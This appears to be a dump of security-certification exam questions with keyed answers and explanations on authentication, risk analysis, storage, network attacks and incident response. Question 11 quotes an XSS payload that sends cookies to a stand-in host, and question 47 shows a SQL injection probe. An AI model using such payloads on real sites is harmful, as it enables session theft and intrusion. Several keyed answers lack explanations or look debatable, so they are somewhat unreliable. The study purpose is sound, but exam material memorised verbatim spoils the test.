QUESTION NO: 140 The helpdesk is receiving multiple calls about slow and intermittent Internet access from the finance department. The following information is compiled: Caller 1, IP 172.16.35.217, NETMASK 255.255.254.0 Caller 2, IP 172.16.35.53, NETMASK 255.255.254.0 Caller 3, IP 172.16.35.173, NETMASK 255.255.254.0 All callers are connected to the same switch and are routed by a router with five built-in interfaces. The upstream router interface's MAC is 00-01-42-32-ab-1a A packet capture shows the following: 09:05:15.934840 arp reply 172.16.34.1 is-at 00:01:42:32:ab:1a (00:01:42:32:ab:1a) 09:06:16.124850 arp reply 172.16.34.1 is-at 00:01:42:32:ab:1a (00:01:42:32:ab:1a) 09:07:25.439811 arp reply 172.16.34.1 is-at 00:01:42:32:ab:1a (00:01:42:32:ab:1a) 09:08:10.937590 IP 172.16.35.1 > 172.16.35.255: ICMP echo request, id 2305, seq 1, length 65534 09:08:10.937591 IP 172.16.35.1 > 172.16.35.255: ICMP echo request, id 2306, seq 2, length 65534 09:08:10.937592 IP 172.16.35.1 > 172.16.35.255: ICMP echo request, id 2307, seq 3, length 65534 Which of the following is occurring on the network? A. A man-in-the-middle attack is underway on the network. B. An ARP flood attack is targeting at the router. C. The default gateway is being spoofed on the network. D. A denial of service attack is targeting at the router.

Answer: D Explanation: The above packet capture shows an attack where the attacker is busy consuming your resources (in this case the router) and preventing normal use. This is thus a Denial Of Service Attack.

QUESTION NO: 106 The IT Security Analyst for a small organization is working on a customer's system and identifies a possible intrusion in a database that contains PII. Since PII is involved, the analyst wants to get the issue addressed as soon as possible. Which of the following is the FIRST step the analyst should take in mitigating the impact of the potential intrusion? A. Contact the local authorities so an investigation can be started as quickly as possible. B. Shut down the production network interfaces on the server and change all of the DBMS account passwords. C. Disable the front-end web server and notify the customer by email to determine how the customer would like to proceed. D. Refer the issue to management for handling according to the incident response process.

Answer: D Explanation: The database contains PII (personally identifiable information) so the natural response is to want to get the issue addressed as soon as possible. However, in this question we have an IT Security Analyst working on a customer's system. Therefore, this IT Security Analyst does not know what the customer's incident response process is. In this case, the IT Security Analyst should refer the issue to company management so they can handle the issue (with your help if required) according to their incident response procedures. Topic 3, Research and Analysis

QUESTION NO: 216 Two separate companies are in the process of integrating their authentication infrastructure into a unified single sign-on system. Currently, both companies use an AD backend and two factor authentication using TOTP. The system administrators have configured a trust relationship between the authentication backend to ensure proper process flow. How should the employees request access to shared resources before the authentication integration is complete? A. They should logon to the system using the username concatenated with the 6-digit code and their original password. B. They should logon to the system using the newly assigned global username: first.lastname#### where #### is the second factor code. C. They should use the username format: LAN\first.lastname together with their original password and the next 6-digit code displayed when the token button is depressed. D. They should use the username format: [email protected], together with a password and their 6-digit code.

Answer: D Explanation: The two companies use Active Directory domains for the authentication (plus the TOTP second factor). The system administrators have configured a trust relationship between the authentication backend. This trust relationship will be an external Active Directory forest/domain trust. With this trust relationship, the AD domain controllers in one domain 'trust' the AD domain controllers in the other domain to perform the authentication. We just need a way of telling the domain controllers which domain the user is from so the authentication can be passed to the appropriate domain controllers. We can do this by logging on with the username format: [email protected]. The '@company.com' part of the username will tell the domain controllers whether the user account is in the local domain or in the other (trusted) domain. Now that the domain login has been passed to a domain controller in the appropriate domain, the user can complete the authentication by entering their password and their TOTP 6-digit code.

QUESTION NO: 338 A new company requirement mandates the implementation of multi-factor authentication to access network resources. The security administrator was asked to research and implement the most cost-effective solution that would allow for the authentication of both hardware and users. The company wants to leverage the PKI infrastructure which is already well established. Which of the following solutions should the security administrator implement? A. Issue individual private/public key pairs to each user, install the private key on the central authentication system, and protect the private key with the user's credentials. Require each user to install the public key on their computer. B. Deploy USB fingerprint scanners on all desktops, and enable the fingerprint scanner on all laptops. Require all network users to register their fingerprint using the reader and store the information in the central authentication system. C. Issue each user one hardware token. Configure the token serial number in the user properties of the central authentication system for each user and require token authentication with PIN for network logon. D. Issue individual private/public key pairs to each user, install the public key on the central authentication system, and require each user to install the private key on their computer and protect it with a password.

Answer: D Explanation: Topic 4, Integration of Computing, Communications and Business Disciplines

QUESTION NO: 123 The Information Security Officer (ISO) is reviewing a summary of the findings from the last COOP tabletop exercise. The Chief Information Officer (CIO) wants to determine which additional controls must be implemented to reduce the risk of an extended customer service outage due to the VoIP system being unavailable. Which of the following BEST describes the scenario presented and the document the ISO is reviewing? A. The ISO is evaluating the business implications of a recent telephone system failure within the BIA. B. The ISO is investigating the impact of a possible downtime of the messaging system within the RA. C. The ISO is calculating the budget adjustment needed to ensure audio/video system redundancy within the RFQ. D. The ISO is assessing the effect of a simulated downtime involving the telecommunication system within the AAR.

Answer: D Explanation: VoIP is an integral part of network design and in particular remote access, that enables customers accessing and communicating with the company. If VoIP is unavailable then the company is in a situation that can be compared to downtime. And since the ISO is reviewing he summary of findings from the last COOP tabletop exercise, it can be said that the ISO is assessing the effect of a simulated downtime within the AAR.

QUESTION NO: 174 A company has decided to change its current business direction and refocus on core business. Consequently, several company sub-businesses are in the process of being sold-off. A security consultant has been engaged to advise on residual information security concerns with a demerger. From a high-level perspective, which of the following BEST provides the procedure that the consultant should follow? A. Perform a penetration test for the current state of the company. Perform another penetration test after the de-merger. Identify the gaps between the two tests. B. Duplicate security-based assets should be sold off for commercial gain to ensure that the security posture of the company does not decline. C. Explain that security consultants are not trained to offer advice on company acquisitions or demergers. This needs to be handled by legal representatives well versed in corporate law. D. Identify the current state from a security viewpoint. Based on the demerger, assess what the security gaps will be from a physical, technical, DR, and policy/awareness perspective.

Answer: D Explanation: When the businesses are sold off, the company will be losing buildings, infrastructure (including IT and security infrastructure) and staff. From a security perspective, by selling off sections of IT infrastructure you will be losing capacity (network, servers, storage, security devices etc.) that could leave the remaining infrastructure vulnerable either to attacks or to hardware failure. Therefore, you need to plan and assess the impact that the reduced assets will have on the remainder of the company.

QUESTION NO: 333 An administrator has a system hardening policy to only allow network access to certain services, to always use similar hardware, and to protect from unauthorized application configuration changes. Which of the following technologies would help meet this policy requirement? (Select TWO). A. Spam filter B. Solid state drives C. Management interface D. Virtualization E. Host firewall

Answer: D,E Explanation:

QUESTION NO: 368 In developing a new computing lifecycle process for a large corporation, the security team is developing the process for decommissioning computing equipment. In order to reduce the potential for data leakage, which of the following should the team consider? (Select TWO). A. Erase all files on drive B. Install of standard image C. Remove and hold all drives D. Physical destruction E. Drive wipe

Answer: D,E Explanation:

QUESTION NO: 229 A security administrator is tasked with increasing the availability of the storage networks while enhancing the performance of existing applications. Which of the following technologies should the administrator implement to meet these goals? (Select TWO). A. LUN masking B. Snapshots C. vSAN D. Dynamic disk pools E. Multipath F. Deduplication

Answer: D,E Explanation: We can use dynamic disk pools (DDP) to increase availability and improve performance compared to traditional RAID. Multipathing also improves availability by creating multiple paths to the storage (in case one path fails) and it improves the performance by aggregating the performance of the multiple paths. DDP dynamically distributes all data, spare capacity, and protection information across a pool of drives. Effectively, DDP is a new type of RAID level, built on RAID 6. It uses an intelligent algorithm to define where each chunk of data should reside. In traditional RAID, drives are organized into arrays, and logical drives are written across stripes on the physical drives in the array. Hot spares contain no data until a drive fails, leaving that spare capacity stranded and without a purpose. In the event of a drive failure, the data is recreated on the hot spare, significantly impacting the performance of all drives in the array during the rebuild process. With DDP, each logical drive's data and spare capacity is distributed across all drives in the pool, so all drives contribute to the aggregate IO of the logical drive, and the spare capacity is available to all logical drives. In the event of a physical drive failure, data is reconstructed throughout the disk pool. Basically, the data that had previously resided on the failed drive is redistributed across all drives in the pool. Recovery from a failed drive may be up to ten times faster than a rebuild in a traditional RAID set, and the performance degradation is much less during the rebuild. In computer storage, multipath I/O is a fault-tolerance and performance-enhancement technique that defines more than one physical path between the CPU in a computer system and its massstorage devices through the buses, controllers, switches, and bridge devices connecting them. As an example, a SCSI hard disk drive may connect to two SCSI controllers on the same computer, or a disk may connect to two Fibre Channel ports. Should one controller, port or switch fail, the operating system can route the I/O through the remaining controller, port or switch transparently and with no changes visible to the applications.

QUESTION NO: 113 The Chief Executive Officer (CEO) of an Internet service provider (ISP) has decided to limit the company's contribution to worldwide Distributed Denial of Service (DDoS) attacks. Which of the following should the ISP implement? (Select TWO). A. Block traffic from the ISP's networks destined for blacklisted IPs. B. Prevent the ISP's customers from querying DNS servers other than those hosted by the ISP. C. Scan the ISP's customer networks using an up-to-date vulnerability scanner. D. Notify customers when services they run are involved in an attack. E. Block traffic with an IP source not allocated to customers from exiting the ISP's network.

Answer: D,E Explanation: Since DDOS attacks can originate from nay different devices and thus makes it harder to defend against, one way to limit the company's contribution to DDOS attacks is to notify customers about any DDOS attack when they run services that are under attack. The company can also block IP sources that are not allocated to customers from the existing SIP's network.

QUESTION NO: 412 Some mobile devices are jail-broken by connecting via USB cable and then exploiting software vulnerabilities to get kernel-level access. Which of the following attack types represents this scenario? (Select TWO). A. Session management attack B. Protocol fuzzing C. Root-kit compromise D. Physical attack E. Privilege escalation F. Man-in-the-middle

Answer: D,E Explanation: Topic 5, Technical Integration of Enterprise Components

QUESTION NO: 125 A company is in the process of implementing a new front end user interface for its customers, the goal is to provide them with more self-service functionality. The application has been written by developers over the last six months and the project is currently in the test phase. Which of the following security activities should be implemented as part of the SDL in order to provide the MOST security coverage over the solution? (Select TWO). A. Perform unit testing of the binary code B. Perform code review over a sampling of the front end source code C. Perform black box penetration testing over the solution D. Perform gray box penetration testing over the solution E. Perform static code review over the front end source code

Answer: D,E Explanation: With grey box penetration testing it means that you have limited insight into the devise which would most probable by some code knowledge and this type of testing over the solution would provide the most security coverage under the circumstances. A Code review refers to the examination of an application (the new network based software product in this case) that is designed to identify and assess threats to the organization. With a static code review it is assumed that you have all the sources available for the application that is being examined. By performing a static code review over the front end source code you can provide adequate security coverage over the solution.

QUESTION NO: 282 In single sign-on, the secondary domain needs to trust the primary domain to do which of the following? (Select TWO). A. Correctly assert the identity and authorization credentials of the end user. B. Correctly assert the authentication and authorization credentials of the end user. C. Protect the authentication credentials used to verify the end user identity to the secondary domain for unauthorized use. D. Protect the authentication credentials used to verify the end user identity to the secondary domain for authorized use. E. Protect the accounting credentials used to verify the end user identity to the secondary domain for unauthorized use. F. Correctly assert the identity and authentication credentials of the end user.

Answer: D,F Explanation:

QUESTION NO: 446 A security manager is collecting RFQ, RFP, and RFI publications to help identify the technology trends which a government will be moving towards in the future. This information is available to the public. By consolidating the information, the security manager will be able to combine several perspectives into a broader view of technology trends. This is an example of which of the following? (Select TWO). A. Supervisory control and data acquisition B. Espionage C. Hacktivism D. Data aggregation E. Universal description discovery and integration F. Open source intelligence gathering

Answer: D,F Explanation:

QUESTION NO: 128 A network administrator with a company's NSP has received a CERT alert for targeted adversarial behavior at the company. In addition to the company's physical security, which of the following can the network administrator use to detect the presence of a malicious actor physically accessing the company's network or information systems from within? (Select TWO). A. RAS B. Vulnerability scanner C. HTTP intercept D. HIDS E. Port scanner F. Protocol analyzer

Answer: D,F Explanation: A protocol analyzer can be used to capture and analyze signals and data traffic over a communication channel which makes it ideal for use to assess a company's network from within under the circumstances. HIDS is used as an intrusion detection system that can monitor and analyze the internal company network especially the dynamic behavior and the state of the computer systems; behavior such as network packets targeted at that specific host, which programs accesses what resources etc.

QUESTION NO: 431 The Chief Risk Officer (CRO) has requested that the MTD, RTO and RPO for key business applications be identified and documented. Which of the following business documents would MOST likely contain the required values? A. MOU B. BPA C. RA D. SLA E. BIA

Answer: E Explanation:

QUESTION NO: 178 A medical device manufacturer has decided to work with another international organization to develop the software for a new robotic surgical platform to be introduced into hospitals within the next 12 months. In order to ensure a competitor does not become aware, management at the medical device manufacturer has decided to keep it secret until formal contracts are signed. Which of the following documents is MOST likely to contain a description of the initial terms and arrangement and is not legally enforceable? A. OLA B. BPA C. SLA D. SOA E. MOU

Answer: E Explanation: A memorandum of understanding (MOU) documents conditions and applied terms for outsourcing partner organizations that must share data and information resources. It must be signed by a re presentative from each organization that has the legal authority to sign and are typically secured, as they are considered confidential.

QUESTION NO: 158 Executive management is asking for a new manufacturing control and workflow automation solution. This application will facilitate management of proprietary information and closely guarded corporate trade secrets. The information security team has been a part of the department meetings and come away with the following notes: Human resources would like complete access to employee data stored in the application. They would like automated data interchange with the employee management application, a cloudbased SaaS application. Sales is asking for easy order tracking to facilitate feedback to customers. Legal is asking for adequate safeguards to protect trade secrets. They are also concerned with data ownership questions and legal jurisdiction. Manufacturing is asking for ease of use. Employees working the assembly line cannot be bothered with additional steps or overhead. System interaction needs to be quick and easy. Quality assurance is concerned about managing the end product and tracking overall performance of the product being produced. They would like read-only access to the entire workflow process for monitoring and baselining. The favored solution is a user friendly software application that would be hosted onsite. It has extensive ACL functionality, but also has readily available APIs for extensibility. It supports readonly access, kiosk automation, custom fields, and data encryption. Which of the following departments' request is in contrast to the favored solution? A. Manufacturing B. Legal C. Sales D. Quality assurance E. Human resources

Answer: E Explanation: The human resources department wanted complete access to employee data stored in the application, and an automated data interchange with their cloud-based SaaS employee management application. However, the favored solution provides read-only access and is hosted onsite.

QUESTION NO: 298 A corporation has expanded for the first time by integrating several newly acquired businesses. Which of the following are the FIRST tasks that the security team should undertake? (Select TWO). A. Remove acquired companies Internet access. B. Federate identity management systems. C. Install firewalls between the businesses. D. Re-image all end user computers to a standard image. E. Develop interconnection policy. F. Conduct a risk analysis of each acquired company's networks.

Answer: E,F Explanation:

QUESTION NO: 214 A security administrator is tasked with implementing two-factor authentication for the company VPN. The VPN is currently configured to authenticate VPN users against a backend RADIUS server. New company policies require a second factor of authentication, and the Information Security Officer has selected PKI as the second factor. Which of the following should the security administrator configure and implement on the VPN concentrator to implement the second factor and ensure that no error messages are displayed to the user during the VPN connection? (Select TWO). A. The user's certificate private key must be installed on the VPN concentrator. B. The CA's certificate private key must be installed on the VPN concentrator. C. The user certificate private key must be signed by the CA. D. The VPN concentrator's certificate private key must be signed by the CA and installed on the VPN concentrator. E. The VPN concentrator's certificate private key must be installed on the VPN concentrator. F. The CA's certificate public key must be installed on the VPN concentrator.

Answer: E,F Explanation: A public key infrastructure (PKI) supports the distribution and identification of public encryption keys, enabling users and computers to both securely exchange data over networks such as the Internet and verify the identity of the other party. A typical PKI includes the following key elements: A CA issues digital certificates to entities and individuals after verifying their identity. It signs these certificates using its private key; its public key is made available to all interested parties in a selfsigned CA certificate. In this question, we have implemented a PKI. The Certificate Authority is the trusted root and supplies certificates to all devices that require one. Every device that trusts the CA will have the CA's public installed... This includes the VPN concentrator. With the VPN concentrator trusting the CA, the VPN concentrator will trust users with certificates supplied by the CA. For the users and their devices to trust the VPN concentrator (to ensure that no error messages are displayed to the user during the VPN connection), the VPN concentrator must have a certificate that includes a private key installed.

QUESTION NO: 194 A facilities manager has observed varying electric use on the company's metered service lines. The facility management rarely interacts with the IT department unless new equipment is being delivered. However, the facility manager thinks that there is a correlation between spikes in electric use and IT department activity. Which of the following business processes and/or practices would provide better management of organizational resources with the IT department's needs? (Select TWO). A. Deploying a radio frequency identification tagging asset management system B. Designing a business resource monitoring system C. Hiring a property custodian D. Purchasing software asset management software E. Facility management participation on a change control board F. Rewriting the change board charter G. Implementation of change management best practices

Answer: E,G Explanation: The purpose of the change management process is to ensure that: Changes should be managed to: The implementation of change management processes should involve a change control board. The change control board is a committee that makes decisions regarding whether or not proposed changes to a project should be implemented. In this question, there is a correlation between spikes in electric use and IT department activity. Therefore, someone from facility management should be part of the change control board.

QUESTION NO: 37 A security administrator has been asked to select a cryptographic algorithm to meet the criteria of a new application. The application utilizes streaming video that can be viewed both on computers and mobile devices. The application designers have asked that the algorithm support the transport encryption with the lowest possible performance overhead. Which of the following recommendations would BEST meet the needs of the application designers? (Select TWO). A. Use AES in Electronic Codebook mode B. Use RC4 in Cipher Block Chaining mode C. Use RC4 with Fixed IV generation D. Use AES with cipher text padding E. Use RC4 with a nonce generated IV F. Use AES in Counter mode

Answer: E,F Explanation: In cryptography, an initialization vector (IV) is a fixed-size input to a cryptographic primitive that is typically required to be random or pseudorandom. Randomization is crucial for encryption schemes to achieve semantic security, a property whereby repeated usage of the scheme under the same key does not allow an attacker to infer relationships between segments of the encrypted message. Some cryptographic primitives require the IV only to be non-repeating, and the required randomness is derived internally. In this case, the IV is commonly called a nonce (number used once), and the primitives are described as stateful as opposed to randomized. This is because the IV need not be explicitly forwarded to a recipient but may be derived from a common state updated at both sender and receiver side. An example of stateful encryption schemes is the counter mode of operation, which uses a sequence number as a nonce. AES is a block cipher. Counter mode turns a block cipher into a stream cipher. It generates the next keystream block by encrypting successive values of a "counter". The counter can be any function which produces a sequence which is guaranteed not to repeat for a long time, although an actual increment-by-one counter is the simplest and most popular.

QUESTION NO: 4 A security architect is designing a new infrastructure using both type 1 and type 2 virtual machines. In addition to the normal complement of security controls (e.g. antivirus, host hardening, HIPS/NIDS) the security architect needs to implement a mechanism to securely store cryptographic keys used to sign code and code modules on the VMs. Which of the following will meet this goal without requiring any hardware pass-through implementations? A. vTPM B. HSM C. TPM D. INE

Answer: A Explanation: A Trusted Platform Module (TPM) is a microchip designed to provide basic security-related functions, primarily involving encryption keys. The TPM is usually installed on the motherboard of a computer, and it communicates with the remainder of the system by using a hardware bus. A vTPM is a virtual Trusted Platform Module. IBM extended the current TPM V1.2 command set with virtual TPM management commands that allow us to create and delete instances of TPMs. Each created instance of a TPM holds an association with a virtual machine (VM) throughout its lifetime on the platform.

QUESTION NO: 63 A security analyst has been asked to develop a quantitative risk analysis and risk assessment for the company's online shopping application. Based on heuristic information from the Security Operations Center (SOC), a Denial of Service Attack (DoS) has been successfully executed 5 times a year. The Business Operations department has determined the loss associated to each attack is $40,000. After implementing application caching, the number of DoS attacks was reduced to one time a year. The cost of the countermeasures was $100,000. Which of the following is the monetary value earned during the first year of operation? A. $60,000 B. $100,000 C. $140,000 D. $200,000

Answer: A Explanation: ALE before implementing application caching: ALE = ARO x SLE ALE = 5 x $40,000 ALE = $200,000 ALE after implementing application caching: ALE = ARO x SLE ALE = 1 x $40,000 ALE = $40,000 The monetary value earned would be the sum of subtracting the ALE calculated after implementing application caching and the cost of the countermeasures, from the ALE calculated before implementing application caching. Monetary value earned = $200,000 - $40,000 - $100,000 Monetary value earned = $60,000

QUESTION NO: 71 A large enterprise acquires another company which uses antivirus from a different vendor. The CISO has requested that data feeds from the two different antivirus platforms be combined in a way that allows management to assess and rate the overall effectiveness of antivirus across the entire organization. Which of the following tools can BEST meet the CISO's requirement? A. GRC B. IPS C. CMDB D. Syslog-ng E. IDS

Answer: A Explanation: GRC is a discipline that aims to coordinate information and activity across governance, risk management and compliance with the purpose of operating more efficiently, enabling effective information sharing, more effectively reporting activities and avoiding wasteful overlaps. An integrated GRC (iGRC) takes data feeds from one or more sources that detect or sense abnormalities, faults or other patterns from security or business applications.

QUESTION NO: 3 A systems administrator establishes a CIFS share on a UNIX device to share data to Windows systems. The security authentication on the Windows domain is set to the highest level. Windows users are stating that they cannot authenticate to the UNIX share. Which of the following settings on the UNIX server would correct this problem? A. Refuse LM and only accept NTLMv2 B. Accept only LM C. Refuse NTLMv2 and accept LM D. Accept only NTLM

Answer: A Explanation: In a Windows network, NT LAN Manager (NTLM) is a suite of Microsoft security protocols that provides authentication, integrity, and confidentiality to users. NTLM is the successor to the authentication protocol in Microsoft LAN Manager (LANMAN or LM), an older Microsoft product, and attempts to provide backwards compatibility with LANMAN. NTLM version 2 (NTLMv2), which was introduced in Windows NT 4.0 SP4 (and natively supported in Windows 2000), enhances NTLM security by hardening the protocol against many spoofing attacks, and adding the ability for a server to authenticate to the client. This question states that the security authentication on the Windows domain is set to the highest level. This will be NTLMv2. Therefore, the answer to the question is to allow NTLMv2 which will enable the Windows users to connect to the UNIX server. To improve security, we should disable the old and insecure LM protocol as it is not used by the Windows computers.

QUESTION NO: 93 A company provides on-demand cloud computing resources for a sensitive project. The company implements a fully virtualized datacenter and terminal server access with two-factor authentication for customer access to the administrative website. The security administrator at the company has uncovered a breach in data confidentiality. Sensitive data from customer A was found on a hidden directory within the VM of company B. Company B is not in the same industry as company A and the two are not competitors. Which of the following has MOST likely occurred? A. Both VMs were left unsecured and an attacker was able to exploit network vulnerabilities to access each and move the data. B. A stolen two factor token was used to move data from one virtual guest to another host on the same network segment. C. A hypervisor server was left un-patched and an attacker was able to use a resource exhaustion attack to gain unauthorized access. D. An employee with administrative access to the virtual guests was able to dump the guest memory onto a mapped disk.

Answer: A Explanation: In this question, two virtual machines have been accessed by an attacker. The question is asking what is MOST likely to have occurred. It is common for operating systems to not be fully patched. Of the options given, the most likely occurrence is that the two VMs were not fully patched allowing an attacker to access each of them. The attacker could then copy data from one VM and hide it in a hidden folder on the other VM.

QUESTION NO: 23 The risk manager has requested a security solution that is centrally managed, can easily be updated, and protects end users' workstations from both known and unknown malicious attacks when connected to either the office or home network. Which of the following would BEST meet this requirement? A. HIPS B. UTM C. Antivirus D. NIPS E. DLP

Answer: A Explanation: In this question, we need to protect the workstations when connected to either the office or home network. Therefore, we need a solution that stays with the workstation when the user takes the computer home. A HIPS (Host Intrusion Prevention System) is software installed on a host which monitors the host for suspicious activity by analyzing events occurring within that host with the aim of detecting and preventing intrusion. Intrusion prevention systems (IPS), also known as intrusion detection and prevention systems (IDPS), are network security appliances that monitor network and/or system activities for malicious activity. The main functions of intrusion prevention systems are to identify malicious activity, log information about this activity, attempt to block/stop it, and report it. Intrusion prevention systems are considered extensions of intrusion detection systems because they both monitor network traffic and/or system activities for malicious activity. The main differences are, unlike intrusion detection systems, intrusion prevention systems are placed in-line and are able to actively prevent/block intrusions that are detected. More specifically, IPS can take such actions as sending an alarm, dropping the malicious packets, resetting the connection and/or blocking the traffic from the offending IP address.

QUESTION NO: 89 The network administrator at an enterprise reported a large data leak. One compromised server was used to aggregate data from several critical application servers and send it out to the Internet using HTTPS. Upon investigation, there have been no user logins over the previous week and the endpoint protection software is not reporting any issues. Which of the following BEST provides insight into where the compromised server collected the information? A. Review the flow data against each server's baseline communications profile. B. Configure the server logs to collect unusual activity including failed logins and restarted services. C. Correlate data loss prevention logs for anomalous communications from the server. D. Setup a packet capture on the firewall to collect all of the server communications.

Answer: A Explanation: Network logging tools such as Syslog, DNS, NetFlow, behavior analytics, IP reputation, honeypots, and DLP solutions provide visibility into the entire infrastructure. This visibility is important because signature-based systems are no longer sufficient for identifying the advanced attacker that relies heavily on custom malware and zero-day exploits. Having knowledge of each host's communications, protocols, and traffic volumes as well as the content of the data in question is key to identifying zero-day and APT (advance persistent threat) malware and agents. Data intelligence allows forensic analysis to identify anomalous or suspicious communications by comparing suspected traffic patterns against normal data communication behavioral baselines. Automated network intelligence and next-generation live forensics provide insight into network events and rely on analytical decisions based on known vs. unknown behavior taking place within a corporate network.

QUESTION NO: 74 The senior security administrator wants to redesign the company DMZ to minimize the risks associated with both external and internal threats. The DMZ design must support security in depth, change management and configuration processes, and support incident reconstruction. Which of the following designs BEST supports the given requirements? A. A dual firewall DMZ with remote logging where each firewall is managed by a separate administrator. B. A single firewall DMZ where each firewall interface is managed by a separate administrator and logging to the cloud. C. A SaaS based firewall which logs to the company's local storage via SSL, and is managed by the change control team. D. A virtualized firewall, where each virtual instance is managed by a separate administrator and logging to the same hardware.

Answer: A Explanation: Security in depth is the concept of creating additional layers of security. The traditional approach of securing the IT infrastructure is no longer enough. Today's threats are multifaceted and often persistent, and traditional network perimeter security controls cannot effectively mitigate them. Organizations need to implement more effective, multi-level security controls that are embedded with their electronic assets. They need to protect key assets from both external and internal threats. This security in depth approach is meant to sustain attacks even when perimeter and traditional controls have been breached. In this question, using two firewalls to secure the DMZ from both external and internal attacks is the best approach. Having each firewall managed by a separate administrator will reduce the chance of a configuration error being made on both firewalls. The remote logging will enable incident reconstruction.

QUESTION NO: 10 A security administrator was doing a packet capture and noticed a system communicating with an unauthorized address within the 2001::/32 prefix. The network administrator confirms there is no IPv6 routing into or out of the network. Which of the following is the BEST course of action? A. Investigate the network traffic and block UDP port 3544 at the firewall B. Remove the system from the network and disable IPv6 at the router C. Locate and remove the unauthorized 6to4 relay from the network D. Disable the switch port and block the 2001::/32 traffic at the firewall

Answer: A Explanation: The 2001::/32 prefix is used for Teredo tunneling. Teredo is a transition technology that gives full IPv6 connectivity for IPv6-capable hosts that are on the IPv4 Internet but have no native connection to an IPv6 network. Unlike similar protocols, it can perform its function even from behind network address translation (NAT) devices such as home routers. Teredo provides IPv6 (Internet Protocol version 6) connectivity by encapsulating IPv6 datagram packets within IPv4 User Datagram Protocol (UDP) packets. Teredo routes these datagrams on the IPv4 Internet and through NAT devices. Teredo nodes elsewhere on the IPv6 network (called Teredo relays) receive the packets, decapsulate them, and pass them on. The Teredo server listens on UDP port 3544. Teredo clients are assigned an IPv6 address that starts with the Teredo prefix (2001::/32). In this question, the BEST course of action would be to block UDP port 3544 at the firewall. This will block the unauthorized communication. You can then investigate the traffic within the network.

QUESTION NO: 11 A security administrator notices the following line in a server's security log: <input name='credentials' type='TEXT' value='" + request.getParameter('><script>document.location='http://badsite.com/?q='document.cookie</scri pt>') + "'; The administrator is concerned that it will take the developer a lot of time to fix the application that is running on the server. Which of the following should the security administrator implement to prevent this particular attack? A. WAF B. Input validation C. SIEM D. Sandboxing E. DAM

Answer: A Explanation: The attack in this question is an XSS (Cross Site Scripting) attack. We can prevent this attack by using a Web Application Firewall. A WAF (Web Application Firewall) protects a Web application by controlling its input and output and the access to and from the application. Running as an appliance, server plug-in or cloudbased service, a WAF inspects every HTML, HTTPS, SOAP and XML-RPC data packet. Through customizable inspection, it is able to prevent attacks such as XSS, SQL injection, session hijacking and buffer overflows, which network firewalls and intrusion detection systems are often not capable of doing. A WAF is also able to detect and prevent new unknown attacks by watching for unfamiliar patterns in the traffic data. A WAF can be either network-based or host-based and is typically deployed through a proxy and placed in front of one or more Web applications. In real time or near-real time, it monitors traffic before it reaches the Web application, analyzing all requests using a rule base to filter out potentially harmful traffic or traffic patterns. Web application firewalls are a common security control used by enterprises to protect Web applications against zero-day exploits, impersonation and known vulnerabilities and attackers.

QUESTION NO: 91 During a new desktop refresh, all hosts are hardened at the OS level before deployment to comply with policy. Six months later, the company is audited for compliance to regulations. The audit discovers that 40 percent of the desktops do not meet requirements. Which of the following is the MOST likely cause of the noncompliance? A. The devices are being modified and settings are being overridden in production. B. The patch management system is causing the devices to be noncompliant after issuing the latest patches. C. The desktop applications were configured with the default username and password. D. 40 percent of the devices use full disk encryption.

Answer: A Explanation: The question states that all hosts are hardened at the OS level before deployment. So we know the desktops are fully patched when the users receive them. Six months later, the desktops do not meet the compliance standards. The most likely explanation for this is that the users have changed the settings of the desktops during the six months that they've had them.

QUESTION NO: 55 Company XYZ finds itself using more cloud-based business tools, and password management is becoming onerous. Security is important to the company; as a result, password replication and shared accounts are not acceptable. Which of the following implementations addresses the distributed login with centralized authentication and has wide compatibility among SaaS vendors? A. Establish a cloud-based authentication service that supports SAML. B. Implement a new Diameter authentication server with read-only attestation. C. Install a read-only Active Directory server in the corporate DMZ for federation. D. Allow external connections to the existing corporate RADIUS server.

Answer: A Explanation: There is widespread adoption of SAML standards by SaaS vendors for single sign-on identity management, in response to customer demands for fast, simple and secure employee, customer and partner access to applications in their environments. By eliminating all passwords and instead using digital signatures for authentication and authorization of data access, SAML has become the Gold Standard for single sign-on into cloud applications. SAML-enabled SaaS applications are easier and quicker to user provision in complex enterprise environments, are more secure and help simplify identity management across large and diverse user communities. Security Assertion Markup Language (SAML) is an XML-based, open-standard data format for exchanging authentication and authorization data between parties, in particular, between an identity provider and a service provider. The SAML specification defines three roles: the principal (typically a user), the Identity provider (IdP), and the service provider (SP). In the use case addressed by SAML, the principal requests a service from the service provider. The service provider requests and obtains an identity assertion from the identity provider. On the basis of this assertion, the service provider can make an access control decision - in other words it can decide whether to perform some service for the connected principal.

QUESTION NO: 47 A security tester is testing a website and performs the following manual query: https://www.comptia.com/cookies.jsp?products=5%20and%201=1 The following response is received in the payload: "ORA-000001: SQL command not properly ended" Which of the following is the response an example of? A. Fingerprinting B. Cross-site scripting C. SQL injection D. Privilege escalation

Answer: A Explanation: This is an example of Fingerprinting. The response to the code entered includes "ORA-000001" which tells the attacker that the database software being used is Oracle. Fingerprinting can be used as a means of ascertaining the operating system of a remote computer on a network. Fingerprinting is more generally used to detect specific versions of applications or protocols that are run on network servers. Fingerprinting can be accomplished "passively" by sniffing network packets passing between hosts, or it can be accomplished "actively" by transmitting specially created packets to the target machine and analyzing the response.

QUESTION NO: 52 A small company is developing a new Internet-facing web application. The security requirements are: Users of the web application must be uniquely identified and authenticated. Users of the web application will not be added to the company's directory services. Passwords must not be stored in the code. Which of the following meets these requirements? A. Use OpenID and allow a third party to authenticate users. B. Use TLS with a shared client certificate for all users. C. Use SAML with federated directory services. D. Use Kerberos and browsers that support SAML.

Answer: A Explanation: Users create accounts by selecting an OpenID identity provider, and then use those accounts to sign onto any website which accepts OpenID authentication. OpenID is an open standard and decentralized protocol by the non-profit OpenID Foundation that allows users to be authenticated by certain co-operating sites (known as Relying Parties or RP) using a third party service. This eliminates the need for webmasters to provide their own ad hoc systems and allowing users to consolidate their digital identities. In other words, users can log into multiple unrelated websites without having to register with their information over and over again. Several large organizations either issue or accept OpenIDs on their websites according to the OpenID Foundation: AOL, Blogger, Flickr, France Telecom, Google, Hyves, LiveJournal, Microsoft (provider name Microsoft account), Mixi, Myspace, Novell, Orange, Sears, Sun, Telecom Italia, Universal Music Group, VeriSign, WordPress, and Yahoo!. Other providers include BBC, IBM, PayPal, and Steam.

